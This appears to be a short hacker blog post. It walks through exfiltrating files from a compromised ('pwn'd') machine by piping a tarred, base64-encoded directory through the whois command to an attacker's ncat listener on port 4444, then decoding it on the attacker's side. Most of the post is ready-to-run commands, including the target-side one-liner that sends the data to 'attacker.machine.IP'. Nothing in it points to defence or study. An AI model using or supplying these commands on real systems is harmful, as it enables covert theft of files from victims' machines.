Sometimes you may want to transfer (juicy) files from a remote system (that you’ve pwn’d, for instance), just to find that you have limited resources.

What could you do ?

Thinking out...

I’ll show you how to, using Whois command.

Let’s see…


On Attacker’s Terminal, type:

ncat -k -l -p 4444 | tee files.b64

Ncat to listen to connections from a target’s machine through port 4444.

Then Tee to a file so you can make sure you have it.

On Target’s Terminal, type:

tar czf - /path/to/directory/* | base64 | xargs -l 2048 timeout 0.03 whois -h attacker.machine.IP -p 4444 2048

Compress the directory you want to transfer and encode it to base64.

Then Send 2048 bits of data to attacker-machine through port 4444 with a timeout of 0.03 using whois command.

STEP 2 (Final)

On Attacker’s Terminal, type:

cat files.b64 | tr -d '\r\n' | base64 -d | tar xvz

Read the file with a base64 encoded tar archive file (files.b64).

Trim / delete all “\r\n”.

Base64 decode the piped standard output from files.b64 file.

Then untar the archive to retrieve the files.

Thanks, made by ❤️

bl4ckbo7 - PWN | Eat | Sleep | Repeat.

Like this post? Share on: TwitterFacebookEmail





Stay in Touch

Get Monthly Updates